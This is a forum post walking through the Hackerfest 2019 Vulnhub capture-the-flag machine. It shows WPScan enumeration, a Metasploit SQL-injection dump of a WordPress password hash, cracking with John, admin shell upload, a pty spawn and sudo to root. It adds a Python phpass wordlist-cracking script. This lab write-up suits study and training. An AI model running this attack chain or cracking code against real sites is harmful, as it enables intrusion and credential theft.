
Hackerfest 2019 : Vulnhub Pentest CTF

Z3R0 · Hacktivist 🌐 · Administration · Administrator
Aug 9, 2018
#1
Hello friends, it has been a long time since I wrote anything, and I thought we would go through a Vulnhub exercise again. In short, today's exercise is called Hackerfest. Hackerfest is an event that is held every year, and this year this CTF challenge was released for it.

You can download the machine from here: CYBSECGROUP

Let's boot the machine and start by discovering it on the network with Angry IP Scanner.
Once we have the IP, let's open that IP address in the browser (in my case the IP was 192.168.50.185).

At that IP address we find a WordPress site, so let's start enumeration with WPScan.

The scan result looks like this:

Code:
┌─[root@parrot]─[/home/z3r0/Downloads]
└──╼ #wpscan --enumerate u,p --url http://192.168.50.185
(WPScan ASCII-art banner)

WordPress Security Scanner by the WPScan Team
Version 3.6.3
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________

[i] Updating the Database ...
[i] Update completed.

[+] URL: http://192.168.50.185/
[+] Started: Thu Oct 31 05:42:39 2019

Interesting Finding(s):

[+] http://192.168.50.185/
| Interesting Entry: Server: Apache/2.4.25 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] http://192.168.50.185/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://192.168.50.185/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.50.185/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] http://192.168.50.185/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.2.3 identified (Insecure, released on 2019-09-05).
| Detected By: Rss Generator (Passive Detection)
| - http://192.168.50.185/?feed=rss2, <generator>https://wordpress.org/?v=5.2.3</generator>
| - http://192.168.50.185/?feed=comments-rss2, <generator>https://wordpress.org/?v=5.2.3</generator>
|
| [!] 6 vulnerabilities identified:
|
| [!] Title: WordPress <= 5.2.3 - Stored XSS in Customizer
| Fixed in: 5.2.4
| References:
| - https://wpvulndb.com/vulnerabilities/9908
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17674
| - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
| - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
|
| [!] Title: WordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts
| Fixed in: 5.2.4
| References:
| - https://wpvulndb.com/vulnerabilities/9909
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17671
| - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
| - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
| - https://github.com/WordPress/WordPress/commit/f82ed753cf00329a5e41f2cb6dc521085136f308
| - https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/
|
| [!] Title: WordPress <= 5.2.3 - Stored XSS in Style Tags
| Fixed in: 5.2.4
| References:
| - https://wpvulndb.com/vulnerabilities/9910
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17672
| - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
| - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
|
| [!] Title: WordPress <= 5.2.3 - JSON Request Cache Poisoning
| Fixed in: 5.2.4
| References:
| - https://wpvulndb.com/vulnerabilities/9911
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17673
| - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
| - https://github.com/WordPress/WordPress/commit/b224c251adfa16a5f84074a3c0886270c9df38de
| - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
|
| [!] Title: WordPress <= 5.2.3 - Server-Side Request Forgery (SSRF) in URL Validation
| Fixed in: 5.2.4
| References:
| - https://wpvulndb.com/vulnerabilities/9912
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17669
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17670
| - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
| - https://github.com/WordPress/WordPress/commit/9db44754b9e4044690a6c32fd74b9d5fe26b07b2
| - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
|
| [!] Title: WordPress <= 5.2.3 - Admin Referrer Validation
| Fixed in: 5.2.4
| References:
| - https://wpvulndb.com/vulnerabilities/9913
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17675
| - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
| - https://github.com/WordPress/WordPress/commit/b183fd1cca0b44a92f0264823dd9f22d2fd8b8d0
| - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html

[+] WordPress theme in use: twentyseventeen
| Location: http://192.168.50.185/wp-content/themes/twentyseventeen/
| Latest Version: 2.2 (up to date)
| Last Updated: 2019-05-07T00:00:00.000Z
| Readme: http://192.168.50.185/wp-content/themes/twentyseventeen/README.txt
| Style URL: http://192.168.50.185/wp-content/themes/twentyseventeen/style.css?ver=5.2.3
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Detected By: Css Style (Passive Detection)
|
| Version: 2.2 (80% confidence)
| Detected By: Style (Passive Detection)
| - http://192.168.50.185/wp-content/themes/twentyseventeen/style.css?ver=5.2.3, Match: 'Version: 2.2'

[+] Enumerating Most Popular Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] wp-google-maps
| Location: http://192.168.50.185/wp-content/plugins/wp-google-maps/
| Last Updated: 2019-10-25T13:36:00.000Z
| [!] The version is out of date, the latest version is 8.0.7
|
| Detected By: Urls In Homepage (Passive Detection)
|
| [!] 4 vulnerabilities identified:
|
| [!] Title: WP Google Maps <= 7.10.41 - Cross-Site Scripting (XSS)
| Fixed in: 7.10.43
| References:
| - https://wpvulndb.com/vulnerabilities/9243
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9912
| - https://security-consulting.icu/blog/2019/02/wordpress-wpgooglemaps-xss/
| - https://lists.openwall.net/full-disclosure/2019/02/05/13
|
| [!] Title: WP Google Maps 7.11.00-7.11.17 - Unauthenticated SQL Injection
| Fixed in: 7.11.18
| References:
| - https://wpvulndb.com/vulnerabilities/9249
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10692
| - https://plugins.trac.wordpress.org/changeset/2061434/wp-google-maps/trunk/includes/class.rest-api.php
|
| [!] Title: WP Google Maps <= 7.11.27 - Admin Settings CSRF
| Fixed in: 7.11.28
| References:
| - https://wpvulndb.com/vulnerabilities/9332
| - https://plugins.trac.wordpress.org/changeset/2099647/wp-google-maps/trunk/legacy-core.php?old=2092302&old_path=wp-google-maps%2Ftrunk%2Flegacy-core.php
|
| [!] Title: WP Google Maps <= 7.11.34 - CSRF to Stored XSS
| Fixed in: 7.11.35
| References:
| - https://wpvulndb.com/vulnerabilities/9442
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14792
| - https://plugins.trac.wordpress.org/changeset/2119722
|
| Version: 7.10.02 (50% confidence)
| Detected By: Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.50.185/wp-content/plugins/wp-google-maps/readme.txt

[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <==> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] webmaster
| Detected By: Author Posts - Display Name (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)


[+] Finished: Thu Oct 31 05:42:45 2019
[+] Requests Done: 72
[+] Cached Requests: 7
[+] Data Sent: 14.607 KB
[+] Data Received: 26.185 MB
[+] Memory used: 212.352 MB
[+] Elapsed time: 00:00:05



As you can see, the wp-google-maps plugin has a SQL injection that we can use, and the enumeration also let us identify the username: webmaster.

An exploit for this injection can be found in the Metasploit Framework.

Code:
┌─[root@parrot]─[/home/z3r0/Downloads]
└──╼ #msfconsole

msf5 > use auxiliary/admin/http/wp_google_maps_sqli 
msf5 auxiliary(admin/http/wp_google_maps_sqli) > show options

Module options (auxiliary/admin/http/wp_google_maps_sqli):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DB_PREFIX  wp_              yes       WordPress table prefix
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the wordpress application
   VHOST                       no        HTTP server virtual host

msf5 auxiliary(admin/http/wp_google_maps_sqli) > set RHOSTS 192.168.50.185
RHOSTS => 192.168.50.185
msf5 auxiliary(admin/http/wp_google_maps_sqli) > run
[*] Running module against 192.168.50.185

[*] 192.168.50.185:80 - Trying to retrieve the wp_users table...
[+] Credentials saved in: /root/.msf4/loot/20191031062337_default_192.168.50.185_wp_google_maps.j_401116.bin
[+] 192.168.50.185:80 - FoundX webmaster $P$BsqOdiLTcye6AS1ofreys4GzRlRvSr1 webmaster@none.local
[*] Auxiliary module execution completed
msf5 auxiliary(admin/http/wp_google_maps_sqli) > exit
We managed to pull the user's password hash ($P$BsqOdiLTcye6AS1ofreys4GzRlRvSr1); now let's try to crack it.

I will use John the Ripper and the most popular wordlist of all, rockyou.txt.

Write the hash into a text file and run the following command:
Code:
┌─[z3r0@parrot]─[~/Desktop]
└──╼ $john --wordlist=./rockyou.txt hash.txt
The password was: kittykat1

Using this password we can get a shell, again with msf:

Code:
msf5 > use exploit/unix/webapp/wp_admin_shell_upload 
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS 192.168.50.185
RHOSTS => 192.168.50.185
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set username webmaster
username => webmaster
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set password kittykat1
password => kittykat1
msf5 exploit(unix/webapp/wp_admin_shell_upload) > run
Let's drop into a shell and switch to the webmaster user:

Code:
meterpreter > shell
Process 5440 created.
Channel 2 created.
sh: 0: getcwd() failed: No such file or directory
sh: 0: getcwd() failed: No such file or directory
su webmaster
su: must be run from a terminal
python -c 'import pty;pty.spawn("/bin/bash")'
shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory

www-data@HF2019-Linux:$ su webmaster
su webmaster
Password: kittykat1

shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
webmaster@HF2019-Linux:$
On the server the webmaster user has sudo rights for any command, so no privilege escalation is needed.
Let's open a root shell:
Code:
webmaster@HF2019-Linux:$ sudo -s
sudo -s
shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
root@HF2019-Linux:.# cd /root
cd /root
chdir: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
root@HF2019-Linux:~# ls
ls
flag.txt
root@HF2019-Linux:~# cat flag.txt
cat flag.txt
3dcdf93d2976321d7a8c47a6bb2d48837d330624
root@HF2019-Linux:~#
That's all, good luck!
 
Likes: W0RLD3ND3R, Zgarbu and Dimitri Khetaguri
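The cracking step above hands the hash to John and only shows the result. The following is an added example, not code from the post or from John the Ripper, that reimplements the WordPress/phpass "$P$" scheme so you can see what John is actually doing with that hash: the fourth character encodes the iteration count (here 'B', i.e. 2^13 = 8192 MD5 rounds), the next 8 characters are the salt, and the remaining 22 are the MD5 result in phpass's own base64 alphabet. POST_HASH is the hash from the msf output in the post; SAMPLE_WORDLIST is a constructed stand-in for rockyou.txt.

```python
"""phpass ($P$) verification and offline wordlist attack, as used for WordPress wp_users.user_pass."""
import hashlib

# phpass uses its own base64 alphabet, not the RFC 4648 one.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

# Hash for "webmaster" as printed by the msf module in the post.
POST_HASH = "$P$BsqOdiLTcye6AS1ofreys4GzRlRvSr1"


def _encode64(data: bytes) -> str:
    """phpass encode64: packs 3 bytes into 4 chars, least-significant bits first."""
    out = []
    i, n = 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def parse_phpass(setting: str):
    """Return (count_log2, salt) from a $P$/$H$ string; raise ValueError if malformed."""
    if len(setting) < 12 or setting[:3] not in ("$P$", "$H$"):
        raise ValueError("not a phpass hash")
    count_log2 = ITOA64.index(setting[3])
    if not 7 <= count_log2 <= 30:          # same bounds phpass itself enforces
        raise ValueError("bad iteration count")
    return count_log2, setting[4:12]


def phpass_hash(password: bytes, setting: str) -> str:
    """Recompute the full 34-char hash of `password` under the salt/count in `setting`."""
    count_log2, salt = parse_phpass(setting)
    digest = hashlib.md5(salt.encode() + password).digest()
    for _ in range(1 << count_log2):       # 'B' -> 2**13 = 8192 rounds
        digest = hashlib.md5(digest + password).digest()
    return setting[:12] + _encode64(digest)


def verify_phpass(password: bytes, stored: str) -> bool:
    """True if `password` produces exactly the stored hash (same salt and count)."""
    return phpass_hash(password, stored) == stored


def wordlist_attack(stored: str, candidates):
    """Return the first candidate that matches `stored`, or None. This is the loop John runs."""
    for word in candidates:
        if verify_phpass(word.encode(), stored):
            return word
    return None


# Constructed mini wordlist standing in for rockyou.txt.
SAMPLE_WORDLIST = ["123456", "password", "kittykat", "kittykat1", "letmein"]

if __name__ == "__main__":
    log2, salt = parse_phpass(POST_HASH)
    print(f"salt={salt} iterations={1 << log2}")
    print("cracked:", wordlist_attack(POST_HASH, SAMPLE_WORDLIST))
```

Two things to take from this: the salt is stored in the clear, so a leaked wp_users table gives an attacker everything needed for an offline attack, and 8192 rounds of MD5 is cheap enough that a wordlist the size of rockyou.txt goes through in minutes on a single machine. That is why John needs no `--format` hint (it recognises `$P$` as phpass) and why a dictionary word with a digit appended falls immediately.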